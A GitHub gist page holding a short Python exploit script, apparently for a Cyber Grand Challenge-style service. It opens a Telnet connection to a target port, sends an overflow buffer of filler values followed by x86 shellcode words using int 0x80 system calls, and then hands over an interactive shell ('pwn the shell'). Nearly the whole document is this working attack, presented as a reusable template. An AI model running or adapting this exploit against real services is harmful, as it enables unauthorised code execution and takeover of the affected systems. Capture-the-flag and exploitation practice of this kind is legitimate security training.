Skip to content

Instantly share code, notes, and snippets.

Created May 18, 2015 15:27
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
from Pwning import *
# customs when binary doesn't have nx eable or mprotect/nmap is on got table
# from Shellcode import *
# edit Templet with your own Name
class CGC(Payload):
def __init__(self):
Payload.__init__(self)[1] = '' # my Target host
self.port = 4347 # my Target port
self.mode = 0 # x86 target platform
# self.mode = 1 x86_64 target platform
self.conn = Telnet([1],self.port)
# ok i go to pwn it :D
def pwnTarget(self):
self.conn.read_until('> ')
pl = '0x41 '*285
pl+= "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41"
pl+= ') '*25
self.conn.write(pl + '\n')
self.conn.interact() # pwn the shell
cgc = CGC()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment